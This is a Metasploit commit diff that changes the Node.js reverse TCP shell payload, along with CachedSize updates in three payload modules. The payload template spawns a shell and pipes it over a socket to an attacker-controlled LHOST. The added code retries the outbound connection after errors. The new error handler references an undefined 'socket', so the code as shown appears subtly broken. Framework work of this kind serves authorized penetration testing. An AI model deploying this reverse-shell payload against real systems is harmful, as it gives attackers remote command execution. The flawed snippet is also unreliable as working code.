Land rapid7#9077, Enhancing the functionality on the nodejs shell_reverse_tcp payload.

Author: jmartin-tech

lib/msf/core/payload/nodejs.rb

@@ -56,16 +56,27 @@ def nodejs_reverse_tcp(opts={})
             util = require("util"),
             sh = cp.spawn(cmd, []);
         var client = this;
-        client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
+        var counter=0;
+        function StagerRepeat(){
+          client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
           client.socket.pipe(sh.stdin);
           if (typeof util.pump === "undefined") {
             sh.stdout.pipe(client.socket);
-            sh.stderr.pipe(client.socket);          
+            sh.stderr.pipe(client.socket);
           } else {
             util.pump(sh.stdout, client.socket);
             util.pump(sh.stderr, client.socket);
           }
         });
+        socket.on("error", function(error) {
+          counter++;
+          if(counter<= #{datastore['StagerRetryCount']}){
+            setTimeout(function() { StagerRepeat();}, #{datastore['StagerRetryWait']}*1000);
+          } else
+            process.exit();
+          });
+        }
+        StagerRepeat();
       })();
     EOS
     cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')

modules/payloads/singles/cmd/unix/reverse_nodejs.rb

@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 2423
+  CachedSize = 3239
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

modules/payloads/singles/nodejs/shell_reverse_tcp.rb

@@ -13,7 +13,7 @@
 
 module MetasploitModule
 
-  CachedSize = 601
+  CachedSize = 805
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb

@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 629
+  CachedSize = 833
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS